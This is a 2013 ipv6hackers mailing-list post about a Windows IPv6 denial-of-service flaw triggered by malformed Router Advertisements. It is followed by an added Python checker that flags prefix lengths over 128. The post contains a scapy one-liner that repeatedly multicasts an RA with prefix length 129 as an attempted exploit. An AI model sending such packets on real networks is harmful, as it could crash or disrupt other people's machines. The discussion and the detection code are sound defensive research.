[ipv6hackers] Windows ping6-of-death

Pierre Emeriaud petrus.lt at gmail.com
Wed Aug 14 10:49:05 CEST 2013


2013/8/14 Fernando Gont <fgont at si6networks.com>:
>
> Ironically enough, they are vulnerable to attack because they don't
> enforce sanity checks, and the ra6 tool of the IPv6-Toolkit cannot
> exploit this attack because it enforces sanity checks on the Prefix
> lengths given by the user. :-)

I tried to send the following frame with scapy. It was sent correctly
but unfortunately I don't have any Windows boxen to test it:
>>> sendp(Ether()/IPv6(dst="ff02::1")/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefix="2001:db8:bad:cafe::",prefixlen=129), loop=1, inter=0.5)

The incorrect prefix length was seen on the wire, but I don't know if
that would be enough to exploit the vuln.


Regards,
Pierre.
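
The receive-side sanity check this thread is about, as an added example that is not part of the original post or of the IPv6 Toolkit: it walks the options of an ICMPv6 Router Advertisement and reports a Prefix Information option whose prefix length exceeds 128, along with malformed option lengths. The names check_ra and build_ra are hypothetical, the sample RA is constructed, and the ICMPv6 checksum is left at zero and not verified.

```python
import struct
import ipaddress

RA_TYPE = 134          # ICMPv6 Router Advertisement (RFC 4861)
RA_HDR_LEN = 16        # fixed RA header that precedes the options
OPT_PREFIX_INFO = 3    # Prefix Information option type
PIO_LEN_UNITS = 4      # a Prefix Information option is 4 * 8 = 32 bytes


def check_ra(icmp6: bytes) -> list[str]:
    """Return the sanity-check failures found in one ICMPv6 RA message."""
    if len(icmp6) < RA_HDR_LEN or icmp6[0] != RA_TYPE:
        return ["not a complete Router Advertisement"]
    problems = []
    off = RA_HDR_LEN
    while off < len(icmp6):
        if len(icmp6) - off < 2:
            problems.append(f"truncated option header at offset {off}")
            break
        opt_type, units = icmp6[off], icmp6[off + 1]
        if units == 0:   # RFC 4861: a zero-length option invalidates the packet
            problems.append(f"zero-length option at offset {off}")
            break
        end = off + units * 8
        if end > len(icmp6):
            problems.append(f"option at offset {off} overruns the packet")
            break
        if opt_type == OPT_PREFIX_INFO:
            if units != PIO_LEN_UNITS:
                problems.append(f"prefix option has length {units}, expected 4")
            else:
                plen = icmp6[off + 2]
                prefix = ipaddress.IPv6Address(icmp6[off + 16:end])
                if plen > 128:   # an IPv6 prefix cannot exceed 128 bits
                    problems.append(f"prefix length {plen} > 128 for {prefix}")
        off = end
    return problems


def build_ra(plen: int) -> bytes:
    """Constructed sample: an RA carrying one Prefix Information option."""
    hdr = struct.pack("!BBHBBHII", RA_TYPE, 0, 0, 64, 0, 1800, 0, 0)
    pio = struct.pack("!BBBBIII", OPT_PREFIX_INFO, PIO_LEN_UNITS, plen, 0xC0,
                      2592000, 604800, 0)
    return hdr + pio + ipaddress.IPv6Address("2001:db8:bad:cafe::").packed

if __name__ == "__main__":
    for plen in (64, 129):
        print(plen, check_ra(build_ra(plen)) or "ok")
```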
